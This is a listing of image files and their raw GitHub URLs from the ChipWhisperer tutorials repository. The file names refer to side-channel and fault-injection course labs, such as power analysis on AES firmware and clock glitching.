-------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_49_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_51_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_51_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab4_1-PowerandHammingWeightRelationship_5_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab4_1-PowerandHammingWeightRelationship_5_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab4_2-CPAonFirmwareImplementationofAES_10_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab4_2-CPAonFirmwareImplementationofAES_10_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_20_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_20_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_32_12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_32_12.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_34_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_34_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_12_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_12_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_20_6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_20_6.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_5.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault2_1-IntroductiontoVoltageGlitching_14_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_fault101_SOLN_Fault2_1-IntroductiontoVoltageGlitching_14_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_3.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_1.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab3_1-LargeHammingWeightSwings_13_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab3_1-LargeHammingWeightSwings_13_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_24_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_24_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_50_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_50_1.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab4_1-PowerandHammingWeightRelationship_5_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab4_1-PowerandHammingWeightRelationship_5_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab4_2-CPAonFirmwareImplementationofAES_10_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab4_2-CPAonFirmwareImplementationofAES_10_0.png -------------------------------------------------------------------------------- /img/Resync_traces_ref.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/Resync_traces_ref.png -------------------------------------------------------------------------------- /img/aes_operations.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/aes_operations.png -------------------------------------------------------------------------------- /img/aesinput.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/aesinput.png -------------------------------------------------------------------------------- /img/clock_glitches.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/clock_glitches.png -------------------------------------------------------------------------------- /img/cw_2part.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/cw_2part.jpg -------------------------------------------------------------------------------- /img/cwcapture_ufo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/cwcapture_ufo.jpg -------------------------------------------------------------------------------- /img/cwlite_plugged.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/cwlite_plugged.jpg -------------------------------------------------------------------------------- /img/cwlitearm_vs_cwlitexmega.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/cwlitearm_vs_cwlitexmega.jpg -------------------------------------------------------------------------------- /img/cwnano.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/cwnano.jpg -------------------------------------------------------------------------------- /img/cwpro_ufo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/cwpro_ufo.jpg -------------------------------------------------------------------------------- /img/cwufo_stm32f3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/cwufo_stm32f3.jpg -------------------------------------------------------------------------------- /img/dpa-doublepeak.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/dpa-doublepeak.png -------------------------------------------------------------------------------- /img/dpa_peakexample.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/dpa_peakexample.png -------------------------------------------------------------------------------- /img/shunt_chipwhisperer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/shunt_chipwhisperer.png -------------------------------------------------------------------------------- /img/spa_password_diffexample.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/spa_password_diffexample.png -------------------------------------------------------------------------------- /img/spa_password_h_vs_0_overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/spa_password_h_vs_0_overview.png -------------------------------------------------------------------------------- /img/spa_password_h_vs_0_zoomed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/spa_password_h_vs_0_zoomed.png -------------------------------------------------------------------------------- /img/spa_password_list_char1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/spa_password_list_char1.png -------------------------------------------------------------------------------- /img/stm_run1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/stm_run1.png -------------------------------------------------------------------------------- /img/traces_wrong.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/traces_wrong.png -------------------------------------------------------------------------------- /img/typehint.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/typehint.png -------------------------------------------------------------------------------- /img/uart_triggers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/uart_triggers.png --------------------------------------------------------------------------------